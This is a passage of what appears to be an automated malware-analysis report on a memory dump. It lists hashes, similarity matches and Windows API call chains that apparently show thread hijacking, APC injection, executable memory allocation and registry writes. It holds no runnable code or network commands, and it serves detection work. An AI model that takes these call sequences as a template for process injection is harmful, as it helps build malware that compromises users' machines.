  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
